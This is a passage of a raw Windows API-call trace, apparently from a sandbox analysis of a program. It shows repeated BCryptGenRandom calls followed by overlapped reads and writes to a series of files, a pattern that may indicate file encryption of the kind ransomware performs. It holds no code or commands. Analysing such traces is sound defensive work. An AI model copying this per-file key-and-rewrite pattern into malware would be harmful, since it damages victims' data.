0x0 [0106.489] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.489] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.489] free (_Block=0x77d800) [0106.489] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.489] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.489] free (_Block=0x1fa4848) [0106.489] free (_Block=0x2071818) [0106.489] free (_Block=0x77d908) [0106.489] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.502] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.515] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2b32, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.517] CloseHandle (hObject=0x81c) returned 1 [0106.525] free (_Block=0x1ff1e60) [0106.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.537] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.537] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.538] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.538] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.538] free (_Block=0x77d800) [0106.538] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.538] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.538] free (_Block=0x1fa4848) [0106.538] free (_Block=0x2071818) [0106.538] free (_Block=0x77d908) [0106.538] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.539] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.540] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.590] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x265a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0106.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.607] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.607] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.627] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.627] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.627] free (_Block=0x77d800) [0106.627] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.627] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.628] free (_Block=0x1fa4848) [0106.628] free (_Block=0x2071818) [0106.628] free (_Block=0x77d908) [0106.628] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0106.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.645] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.645] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.645] free (_Block=0x77d800) [0106.645] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.645] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.645] free (_Block=0x1fa4848) [0106.645] free (_Block=0x2071818) [0106.645] free (_Block=0x77d908) [0106.645] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0106.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.657] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.657] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.657] free (_Block=0x77d800) [0106.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.657] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.657] free (_Block=0x1fa4848) [0106.657] free (_Block=0x2071818) [0106.657] free (_Block=0x77d908) [0106.657] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.311] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.311] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.312] free (_Block=0x77d800) [0108.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.312] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.312] free (_Block=0x1fa4848) [0108.312] free (_Block=0x2071818) [0108.312] free (_Block=0x77d908) [0108.312] WriteFile (in: hFile=0x3ac, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0108.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.317] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x2458, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0108.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.365] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xfb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.365] CloseHandle (hObject=0x13c0) returned 1 [0108.368] free (_Block=0x1ff1e60) [0108.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.376] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.376] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.376] free (_Block=0x77d800) [0108.376] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.376] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.376] free (_Block=0x1fa4848) [0108.376] free (_Block=0x2071818) [0108.376] free (_Block=0x77d908) [0108.376] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.427] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.427] CloseHandle (hObject=0x13c0) returned 1 [0108.428] free (_Block=0x1ff1e60) [0108.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.444] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.444] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.444] free (_Block=0x77d800) [0108.444] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.444] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.445] free (_Block=0x1fa4848) [0108.445] free (_Block=0x2071818) [0108.445] free (_Block=0x77d908) [0108.445] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.445] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.458] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1264, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.459] CloseHandle (hObject=0x13c0) returned 1 [0108.460] free (_Block=0x1ff1e60) [0108.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.482] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.482] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.482] free (_Block=0x77d800) [0108.482] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.482] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.483] free (_Block=0x1fa4848) [0108.483] free (_Block=0x2071818) [0108.483] free (_Block=0x77d908) [0108.483] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.483] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.494] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x30c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.518] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.519] CloseHandle (hObject=0x13c0) returned 1 [0108.520] free (_Block=0x1ff1e60) [0108.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.530] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.530] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.530] free (_Block=0x77d800) [0108.530] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.530] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.530] free (_Block=0x1fa4848) [0108.530] free (_Block=0x2071818) [0108.530] free (_Block=0x77d908) [0108.530] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.531] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.541] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa54, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.541] CloseHandle (hObject=0x13c0) returned 1 [0108.546] free (_Block=0x1ff1e60) [0108.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.554] 